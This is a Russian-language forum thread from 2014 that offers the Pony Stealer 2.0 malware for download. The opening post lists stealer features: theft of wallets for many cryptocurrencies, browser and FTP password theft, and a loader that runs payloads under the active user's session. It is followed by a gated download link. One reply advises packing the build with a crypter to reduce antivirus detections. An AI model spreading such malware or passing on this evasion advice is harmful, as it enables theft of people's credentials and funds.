Стиллер Pony Stealer 2.0 With Cryptocoins

Тема в разделе "Вирусология", создана пользователем Огонёк, 28.07.14.

Статус темы:
Закрыта.
  1. Огонёк

Огонёк Premium

Симпатии:
    6.130

[!] Реализован сбор кошельков Bitcoin для оригинального клиента, а также Electrum, MultiBit, Litecoin, Namecoin, Terracoin,
    Bitcoin Armory, PPCoin (Peercoin), Primecoin, Feathercoin, NovaCoin, Freicoin, Devcoin, Frankocoin, ProtoShares, MegaCoin,
    Quarkcoin, Worldcoin, Infinitecoin, Ixcoin, Anoncoin, BBQcoin, Digitalcoin, Mincoin, Goldcoin, Yacoin, Zetacoin, Fastcoin,
    I0coin, Tagcoin, Bytecoin, Florincoin, Phoenixcoin, Luckycoin, Craftcoin, Junkcoin
    [+] Реализован сбор паролей из Я.Браузер, FTP Disk, новых версий Opera (основанных на коде Chrome)
    [*] При работе программы от имени пользователя SYSTEM (сервиса Windows) лоадер теперь будет запускать файл с правами активной сессии (залогиненного) пользователя
    [*] Доработан сбор паролей Firefox, теперь не зависит от наличия библиотек SQLite3
    [+] Опциональный резервный режим загрузчика: если успешно загружен первый файл - остальные будут пропущены
    [+] Добавлена возможность отключить сбор паролей (оставить только лоадер)
    [-] Исправлен процессинг SQLite3 файлов для Chrome / Firefox содержащих 48 bit integers
    [-] Исправлен серьезный баг в нескольких функциях, который мог приводить к ошибкам при сборе паролей и вылету программы

[HIDE-POSTS=25]Скачать:
    http://rghost.ru/private/56897778/9c69c707b27dfc01c0beed8a68fd52ff?r=3612[/HIDE-POSTS]

2. ch1p1337

ch1p1337 Участник

Симпатии:
    8
    Ну вообще я думаю можно закриптовать билд стилерра энегмой и под 10-15 вирусов шелухи выдаст, так что норм.

3. XxXkjluhokXxX

XxXkjluhokXxX Местный

Симпатии:
    64
    крутоо норм

Статус темы:
Закрыта.